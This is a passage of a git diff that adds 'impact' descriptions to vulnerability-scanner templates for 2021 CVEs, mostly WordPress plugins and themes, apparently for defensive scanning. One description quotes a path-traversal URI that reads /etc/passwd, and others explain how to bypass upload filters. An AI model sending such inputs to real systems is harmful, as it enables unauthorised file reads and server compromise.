@@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: critical description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 896861a941..68e278e1da 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router. remediation: | Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented. reference: diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 8da2779bdb..3e724f310a 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 6fe33982e4..8be65ddc98 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -5,6 +5,8 @@ info: author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents. remediation: | Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 311285082e..437efc6dec 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update the WordPress Like Button Rating plugin to version 2.6.32 or later. reference: diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 66915fe945..54162db752 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 1.6.0. reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f330c0f405..6e4d03e350 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 5e659da917..36138e41fc 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index fa5198b5b3..c9b1b0cbe1 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml 
@@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 476ba29200..cadecd0aec 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index b237332eb0..49a8a29db4 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml 
@@ -5,6 +5,8 @@ info: author: tess severity: medium description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index f8a58238a6..2292d5b29d 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: high description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index e48d39a4a2..0048b9963b 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml 
@@ -5,6 +5,8 @@ info: author: theamanrawat severity: high description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 02e42fcaf7..b85b33fa53 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Goto Tour & Travel Theme (>=2.0) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 8eaca4cb3c..aab70ac83e 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code. + impact: | + This vulnerability can lead to remote code execution and compromise the affected WordPress site. remediation: | Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index c1241ceb60..485cc456c4 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index a1ce3a566d..7f9a4d5b42 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim. remediation: Fixed in version 3.7.0.1. reference: - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34 diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index d9810e8d46..3e81336504 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Stop Spammers plugin (2021.9 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index a5c60f4bc9..f346dad260 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update the WordPress Supsystic Ultimate Maps plugin to version 1.2.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 5859613a95..e87afe1047 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Popup by Supsystic before 1.10.5 did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected cross-site scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Popup by Supsystic version 1.10.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 226854055d..ed91134b93 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index 842ae5ba1b..5310170d43 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -5,6 +5,8 @@ info: author: 2rs3c severity: high description: WordPress Contact Form 7 before version 2.3.4 allows unauthenticated users to use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function. + impact: | + Attackers can exploit this vulnerability to perform actions on behalf of authenticated users, leading to potential data breaches or unauthorized access. remediation: | Update WordPress Contact Form 7 plugin to version 2.3.4 or later to fix the Arbitrary Nonce Generation vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index c26b8abaf6..f2e774d47e 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Kaswara Modern VC Addons plugin through 3.0.1 is susceptible to an arbitrary file upload. The plugin allows unauthenticated arbitrary file upload via the uploadFontIcon AJAX action, which can be used to obtain code execution. The supplied zipfile is unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress website. remediation: | Update to the latest version of Kaswara Modern VC Addons plugin (>=3.0.2) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index d9d99e9036..a9fcd308b2 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -5,6 +5,8 @@ info: author: ShreyaPohekar severity: critical description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script. reference: diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index 737f6bdc1a..23fb7837a3 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Select All Categories and Taxonomies plugin before 1.3.2 contains a cross-site scripting vulnerability. The settings page of the plugin does not properly sanitize the tab parameter before outputting it back. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.3.2. reference: - https://www.exploit-db.com/exploits/50349 diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 113674866d..236279563e 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 02aa67a1a6..17fb9ae140 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Photo Gallery by 10Web plugin before 1.5.69 contains multiple reflected cross-site scripting vulnerabilities via the gallery_id, tag, album_id and theme_id GET parameters passed to the bwg_frontend_data AJAX action, available to both unauthenticated and authenticated users. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress Photo Gallery by 10Web to version 1.5.69 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 4068a35d34..b0f5b50fdd 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Simple Giveaways plugin before 2.36.2 contains a cross-site scripting vulnerability via the method and share GET parameters of the Giveaway pages, which are not sanitized, validated, or escaped before being output back in the pages. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Update to the latest version of the WordPress Simple Giveaways plugin (2.36.2 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index eff25ca295..e069f8a040 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml 
@@ -5,6 +5,8 @@ info: author: cckuailong severity: medium description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress WooCommerce plugin to version 1.13.22 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 322261952e..f32ff25e68 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Mediumish Theme plugin (1.0.47 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 381ff3bfae..0320005b82 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update WordPress Bello Directory & Listing Theme to version 1.6.0 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index a087310d9c..3275e63239 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Car Repair Services & Auto Mechanic Theme (version 4.0 or higher) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 1ff5552100..560ac41b80 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*). + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index ad79aa05bd..f5328ce5ca 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP. + impact: | + Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site. remediation: Fixed in version 4.22. reference: - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index d118a8e04d..e35bfac8f4 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update to the latest version of WordPress The Plus Addons for Elementor plugin (4.1.12 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 55358d010a..0e893967ce 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: WordPress Plus Addons for Elementor Page Builder before 4.1.10 did not validate a redirect parameter on a specifically crafted URL before redirecting the user to it, leading to an open redirect issue. + impact: | + This vulnerability can be exploited by attackers to trick users into visiting malicious websites, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Upgrade Plus Addons for Elementor Page Builder to version 4.1.10 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 08591d9593..bc451f341a 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 9d4649c4b3..b5cc0531f7 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Fancy Product Designer plugin before 4.6.9 is susceptible to an arbitrary file upload. An attacker can upload malicious files and execute code on the server, modify data, and/or gain full control over a compromised system without authentication. + impact: | + Attackers can upload malicious files and execute arbitrary code on the target system. remediation: | Update WordPress Fancy Product Designer plugin to version 4.6.9 or later to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 81f3eed5fa..71111671ce 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update WordPress Pro Real Estate 7 Theme to version 3.1.1 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 187413d81f..8678c1443d 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update the WordPress FoodBakery plugin to version 2.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 13e4224a21..267d828848 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: WordPress wpForo Forum < 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login. + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information. remediation: | Update wpForo Forum to version 1.9.7 or later to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index f6146e8edd..ccd0c02909 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the Jannah Theme to version 5.4.5 or later, which includes 